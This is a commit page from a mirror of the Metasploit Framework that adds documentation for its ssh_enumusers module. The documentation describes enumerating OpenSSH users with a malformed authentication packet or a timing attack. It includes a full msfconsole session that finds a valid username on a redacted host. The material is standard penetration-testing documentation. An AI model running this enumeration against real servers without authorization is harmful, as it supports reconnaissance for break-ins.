infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #10498, module doc for ssh_enumusers

GSoC/Meterpreter_Web_Console
William Vu 2018-08-20 19:30:29 -05:00
parent bc3b317963 06582a00a0
commit 2fe6bd0e98
No known key found for this signature in database
GPG Key ID: 68BD00CE25866743
2 changed files with 80 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

79
documentation/modules/auxiliary/scanner/ssh/ssh_enumusers.md Normal file
View File

@ -0,0 +1,79 @@
## Intro
This module uses a malformed packet or timing attack to enumerate users on
an OpenSSH server.
Testing note: invalid users were logged, while valid users were not. YMMV.
## Actions
**Malformed Packet**
The default action sends a malformed (corrupted) `SSH_MSG_USERAUTH_REQUEST`
packet using public key authentication (must be enabled) to enumerate users.
**Timing Attack**
On some versions of OpenSSH under some configurations, OpenSSH will return a
"permission denied" error for an invalid user faster than for a valid user,
creating an opportunity for a timing attack to enumerate users.
## Options
**USERNAME**
Single username to test (username spray).
**USER_FILE**
File containing usernames, one per line.
**THRESHOLD**
Amount of seconds needed before a user is considered found (timing attack only).
**CHECK_FALSE**
Check for false positives (random username).
## Usage
```
msf5 > use auxiliary/scanner/ssh/ssh_enumusers
msf5 auxiliary(scanner/ssh/ssh_enumusers) > set rhosts [redacted]
rhosts => [redacted]
msf5 auxiliary(scanner/ssh/ssh_enumusers) > echo $'wvu\nbcook' > users
[*] exec: echo $'wvu\nbcook' > users
msf5 auxiliary(scanner/ssh/ssh_enumusers) > set user_file users
user_file => users
msf5 auxiliary(scanner/ssh/ssh_enumusers) > set verbose true
verbose => true
msf5 auxiliary(scanner/ssh/ssh_enumusers) > run
[*] [redacted]:22 - SSH - Using malformed packet technique
[*] [redacted]:22 - SSH - Starting scan
[+] [redacted]:22 - SSH - User 'wvu' found
[-] [redacted]:22 - SSH - User 'bcook' not found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssh/ssh_enumusers) > set action Timing Attack
action => Timing Attack
msf5 auxiliary(scanner/ssh/ssh_enumusers) > run
[*] [redacted]:22 - SSH - Using timing attack technique
[*] [redacted]:22 - SSH - Starting scan
[+] [redacted]:22 - SSH - User 'wvu' found
[-] [redacted]:22 - SSH - User 'bcook' not found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssh/ssh_enumusers) > creds
Credentials
===========
host origin service public private realm private_type
---- ------ ------- ------ ------- ----- ------------
[redacted] [redacted] 22/tcp (ssh) wvu
msf5 auxiliary(scanner/ssh/ssh_enumusers) >
```

2
modules/auxiliary/scanner/ssh/ssh_enumusers.rb
View File

@ -18,7 +18,7 @@ class MetasploitModule < Msf::Auxiliary
This module uses a malformed packet or timing attack to enumerate users on This module uses a malformed packet or timing attack to enumerate users on
an OpenSSH server. an OpenSSH server.
The default action sends a malformed (truncated) SSH_MSG_USERAUTH_REQUEST The default action sends a malformed (corrupted) SSH_MSG_USERAUTH_REQUEST
packet using public key authentication (must be enabled) to enumerate users. packet using public key authentication (must be enabled) to enumerate users.
On some versions of OpenSSH under some configurations, OpenSSH will return a On some versions of OpenSSH under some configurations, OpenSSH will return a